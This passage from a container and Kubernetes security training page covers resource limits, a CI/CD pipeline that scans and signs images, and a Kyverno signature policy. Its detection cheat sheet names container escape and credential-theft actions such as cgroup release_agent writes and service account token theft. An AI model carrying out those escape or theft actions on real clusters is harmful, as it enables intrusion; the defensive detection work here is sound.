kind: LimitRange
metadata:
  name: default-limits
  namespace: production
spec:
  limits:
  - default:
      memory: 256Mi
      cpu: 500m
    defaultRequest:
      memory: 128Mi
      cpu: 250m
    type: Container

16. Complete CI/CD Security Pipeline

Pipeline Architecture

Source → Build → Scan → Sign → Store → Deploy → Monitor
  │        │       │      │       │       │        │
  │        │       │      │       │       │        └─ Falco runtime detection
  │        │       │      │       │       └─ Admission controller (verify signature)
  │        │       │      │       └─ Harbor registry (RBAC, replication)
  │        │       │      └─ Cosign keyless signing + attestation
  │        │       └─ Trivy (CVEs) + Dockle (lint) + Grype (SBOM scan)
  │        └─ SLSA L3 hardened build (provenance generated)
  │
  └─ Syft SBOM generation at source

GitHub Actions Example

name: Secure Container Pipeline
on: [push]

jobs:
  build-scan-sign:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # For keyless signing
      contents: read
      security-events: write

    steps:
    - uses: actions/checkout@v4

    # Build
    - name: Build image
      run: docker build -t $IMAGE .

    # Generate SBOM
    - name: Generate SBOM
      run: syft $IMAGE -o spdx-json=sbom.spdx.json

    # Lint image
    - name: Lint with Dockle
      run: dockle --exit-code 1 --exit-level fatal $IMAGE

    # Scan for vulnerabilities
    - name: Scan with Trivy
      uses: aquasecurity/trivy-action@master
      with:
        image-ref: ${{ env.IMAGE }}
        severity: 'CRITICAL,HIGH'
        exit-code: '1'

    # Scan SBOM with Grype
    - name: Scan SBOM
      run: grype sbom:./sbom.spdx.json --fail-on high

    # Push to registry
    - name: Push image
      run: docker push $IMAGE

    # Sign image (keyless)
    - name: Sign with Cosign
      run: cosign sign $IMAGE --yes

    # Attach SBOM as attestation
    - name: Attest SBOM
      run: cosign attest --predicate sbom.spdx.json --type spdxjson $IMAGE --yes

Admission Controller Verification

# Kyverno policy to verify image signatures
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  rules:
  - name: verify-cosign-signature
    match:
      any:
      - resources:
          kinds:
          - Pod
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestors:
      - entries:
        - keyless:
            issuer: "https://token.actions.githubusercontent.com"
            subject: "https://github.com/myorg/*"

17. Detection Cheat Sheet

Container Escape Indicators

Indicator Detection Method ATT&CK
nsenter execution Falco rule on process spawn T1611
chroot to host path Falco rule on chroot syscall T1611
Mount operations in container Falco rule on mount syscall T1611
Cgroup release_agent write File integrity monitoring T1611
/proc/1/root access Falco rule on file access T1611
Device file access (/dev/sda) Falco rule on open syscall T1611

Kubernetes API Abuse Indicators

Indicator Detection Method ATT&CK
Secret enumeration (list all) Audit log: verb=list resource=secrets T1552.007
Pod creation with hostPath Admission controller + audit log T1610
Privileged pod creation PSA enforcement + audit log T1610
ClusterRole binding changes Audit log: resource=clusterrolebindings T1098
Service account token theft Falco rule on token file read T1528
Exec into pod Audit log: subresource=exec T1609

Supply Chain Attack Indicators

Indicator Detection Method ATT&CK
Unsigned image deployment Admission controller (Cosign verify) T1195.002
Image from untrusted registry ImagePolicyWebhook T1195.002
New CVE in running image Continuous scanning (Harbor/Trivy) T1195.002
SBOM deviation from baseline Syft diff between builds T1195.001
Modified provenance metadata SLSA verification failure T1195.002

18. Key References & Tools Summary

Tool Purpose Category
Trivy Multi-scanner (CVEs, secrets, misconfig, SBOM) Vulnerability
Grype Vulnerability scanner with EPSS/KEV prioritization Vulnerability
Syft SBOM generator (SPDX, CycloneDX) Supply Chain
Cosign Container signing/verification (keyless via Sigstore) Supply Chain
Dockle Container image linter (CIS Docker Benchmark) Compliance
kube-bench CIS Kubernetes Benchmark checker Compliance
kube-hunter K8s penetration testing / attack simulation Offensive
kubesec K8s manifest security scoring Compliance
Falco Runtime syscall monitoring + rule engine Detection
Harbor Registry with integrated scanning, signing, SBOM Registry
imgcrypt Container image layer encryption Confidentiality
OPA/Gatekeeper Policy engine admission controller Policy
Kyverno K8s-native policy engine Policy
Kubernetes Goat Vulnerable K8s lab (22 scenarios) Training
gVisor User-space kernel sandbox (runsc) Isolation
Kata Containers Lightweight VM isolation Isolation
PreviousDNS & Email
NextAWS Security

On this page

  • Training Session: 2026-03-14
  • Source Material: OWASP Docker/K8s Cheat Sheets, K8s Security Docs, Trivy, kube-bench, kube-hunter, kubesec, Falco, Dockle, SLSA, Cosign, Grype, Syft, Kubernetes Goat, BishopFox Pod Privesc, Harbor, imgcrypt
  • 1. Docker Hardening Controls (OWASP)
  • Host & Daemon Security
  • Container Isolation & Privilege Restriction
  • Filesystem Security
  • Network Security
  • Image Security
  • Linux Security Modules
  • 2. Kubernetes RBAC
  • Architecture
  • Role Types
  • Least Privilege Pattern
  • RBAC Anti-Patterns (Attack Surface)
  • RBAC Hardening
  • 3. Kubernetes Network Policies
  • Default: Allow All
  • Deny-All Baseline
  • Allow Specific Traffic
  • Network Policy Limitations
  • Egress Control Pattern
  • 4. Pod Security Admission (PSA)
  • Pod Security Standards (Three Levels)
  • Enforcement Modes
  • Namespace-Level Configuration
  • Restricted Security Context (Full Hardening)
  • 5. Container Escape Techniques (BishopFox "Bad Pods")
  • Taxonomy of Pod Privilege Escalation
  • Bad Pod #1: Everything Allowed
  • Bad Pod #2: Privileged + HostPID
  • Bad Pod #3: Privileged Only
  • Bad Pod #4: HostPath Only
  • Bad Pod #5: HostPID Only
  • Bad Pod #6: HostNetwork Only
  • Bad Pod #7: HostIPC Only
  • Bad Pod #8: Nothing Allowed (Standard Pod)
  • Universal Mitigations
  • 6. Kubernetes API Server & etcd Hardening
  • API Server Authentication (Recommended)
  • etcd Security
  • Critical Ports to Restrict
  • Audit Logging
  • Admission Controllers
  • 7. Secrets Management in Kubernetes
  • Problem: K8s Secrets Are Base64, Not Encrypted
  • Hardening Chain
  • 8. Runtime Security with Falco
  • Architecture
  • Rule Syntax
  • Deployment Options
  • Output Channels
  • Detection Capabilities
  • 9. Supply Chain Security
  • 9.1 SBOM Generation with Syft
  • 9.2 Vulnerability Scanning with Grype
  • 9.3 Vulnerability Scanning with Trivy
  • 9.4 Container Image Linting with Dockle
  • 9.5 Container Signing with Cosign (Sigstore)
  • 9.6 SLSA Framework (Supply-chain Levels for Software Artifacts)
  • 9.7 Container Image Encryption (imgcrypt)
  • 9.8 Harbor Registry -- Scanning & Signing Workflows
  • 10. CIS Kubernetes Benchmark (kube-bench)
  • Purpose
  • Usage
  • Key Check Categories
  • 11. Kubernetes Penetration Testing (kube-hunter)
  • Capabilities
  • Scanning Modes
  • Detection Categories
  • Core Hunter Modules
  • 12. Kubernetes Resource Security Scoring (kubesec)
  • Purpose
  • Usage
  • Scoring
  • Integration Points
  • 13. Kubernetes Goat -- Vulnerable Lab Scenarios
  • Attack Scenarios
  • 14. Runtime Sandboxing
  • Options Beyond Standard Containers
  • RuntimeClass Configuration
  • Kernel Module Prevention
  • 15. Resource Quotas & Limit Ranges (DoS Prevention)
  • 16. Complete CI/CD Security Pipeline
  • Pipeline Architecture
  • GitHub Actions Example
  • Admission Controller Verification
  • 17. Detection Cheat Sheet
  • Container Escape Indicators
  • Kubernetes API Abuse Indicators
  • Supply Chain Attack Indicators
  • 18. Key References & Tools Summary